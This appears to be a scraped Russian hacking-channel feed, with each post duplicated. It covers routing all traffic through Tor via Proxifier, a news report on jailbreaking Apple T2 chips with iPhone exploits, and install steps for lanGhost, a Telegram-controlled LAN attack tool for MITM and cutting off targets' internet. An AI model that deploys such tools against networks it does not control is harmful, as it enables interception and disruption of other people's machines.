Для пропуска трафика через Tor необходимо скачать его клиент. Далее потребуется Proxifier. Скачать его можно отсюда, не забывайте проверить файл антивирусом перед запуском.
Настройка
Запускаем Tor Browser.
Запускаем Proxifier. Во вкладке "Profile" выбираем пункт "Proxy servers". В открывшемся окне нажимаем "Add" и вводим локальный адрес
Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.
Пропуск всего трафика через сеть Tor повысит безопасность и анонимность пользователя. Помимо этого, для любого браузера станут доступными сайты доменной зоны .onion.
Минусом данной процедуры является значительное уменьшение скорости интернета, что может привести к невозможности проводить прямые трансляции либо усложнит коммуникацию в том же Zoom, к примеру. Однако этот способ имеет место быть, особенно когда нужно анонимизировать некоторые фоновые процессы.
Установка всего необходимого
Для пропуска трафика через Tor необходимо скачать его клиент. Далее потребуется Proxifier. Скачать его можно отсюда, не забывайте проверить файл антивирусом перед запуском.
Настройка
Запускаем Tor Browser.
Запускаем Proxifier. Во вкладке "Profile" выбираем пункт "Proxy servers". В открывшемся окне нажимаем "Add" и вводим локальный адрес
127.0.0.1 с портом 9050 и типом Socks 5.Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.
Взломать Mac можно с помощью джейлбрейка для iPhone
По словам исследователей безопасности, с помощью двух эксплоитов для джейлбрейка iPhone можно взломать Mac и MacBook с новейшими чипами безопасности Apple T2.
Техника взлома компьютеров Apple с помощью двух эксплоитов для iPhone весьма сложная, и ее обсуждение уже несколько недель ведется в Twitter и на форуме Reddit. Если все сделать правильно, новая техника позволяет атакующему получить полный контроль над устройством, модифицировать поведение операционной системы, похищать важные данные и развертывать вредоносное ПО.
Исследователи утверждают, что им удалось найти способ, позволяющий запускать код внутри чипа безопасности в процессе его загрузки и модифицировать его поведение. Способ предполагает использование двух джейлбрейков для iPhone – Checkm8 и Blackbird . Это возможно, так как в T2 и iPhone используются одни и те же аппаратные компоненты и некоторые программные функции.
Как сообщает бельгийская ИБ-компания ironPeak, взлом T2 предполагает подключение к Mac/MacBook через USB-C и запуск в процессе его загрузки версии джейлбрейка Checkra1n 0.11.0. Это позволяет создать кабель USB-C, способный автоматически эксплуатировать macOS-устройство во время загрузки. Таким образом атакующий может получить доступ к T2 на уровне суперпользователя, модифицировать и управлять всеми данными на устройстве и даже восстанавливать зашифрованные данные.
Поскольку проблема существует на аппаратном уровне, исправить ее с помощью обновления ПО невозможно. Единственное, что могут сделать пользователи уже после атаки, – переустановить операционную систему чипа BridgeOS.
#новость
По словам исследователей безопасности, с помощью двух эксплоитов для джейлбрейка iPhone можно взломать Mac и MacBook с новейшими чипами безопасности Apple T2.
Техника взлома компьютеров Apple с помощью двух эксплоитов для iPhone весьма сложная, и ее обсуждение уже несколько недель ведется в Twitter и на форуме Reddit. Если все сделать правильно, новая техника позволяет атакующему получить полный контроль над устройством, модифицировать поведение операционной системы, похищать важные данные и развертывать вредоносное ПО.
Исследователи утверждают, что им удалось найти способ, позволяющий запускать код внутри чипа безопасности в процессе его загрузки и модифицировать его поведение. Способ предполагает использование двух джейлбрейков для iPhone – Checkm8 и Blackbird . Это возможно, так как в T2 и iPhone используются одни и те же аппаратные компоненты и некоторые программные функции.
Как сообщает бельгийская ИБ-компания ironPeak, взлом T2 предполагает подключение к Mac/MacBook через USB-C и запуск в процессе его загрузки версии джейлбрейка Checkra1n 0.11.0. Это позволяет создать кабель USB-C, способный автоматически эксплуатировать macOS-устройство во время загрузки. Таким образом атакующий может получить доступ к T2 на уровне суперпользователя, модифицировать и управлять всеми данными на устройстве и даже восстанавливать зашифрованные данные.
Поскольку проблема существует на аппаратном уровне, исправить ее с помощью обновления ПО невозможно. Единственное, что могут сделать пользователи уже после атаки, – переустановить операционную систему чипа BridgeOS.
#новость
Манипулирование компьютерами в локальной сети
Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.
Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.
Установка
Устанавливаем Kali Linux.
Обновляем репозитории
◽️
◽️
◽️
◽️
Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali
Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.
Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.
Установка
Устанавливаем Kali Linux.
Обновляем репозитории
◽️
apt-get update –y && apt-get upgrade –y && apt-get dist-upgrade
Устанавливаем Python 3◽️
apt-get install python3 python3-pip
Скачиваем репозиторий◽️
git clone https://github.com/xdavidhu/lanGhost
Переходим в директорию и запускаем установщик◽️
cd LanGhost/
◽️./setup.py
НастройкаДалее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali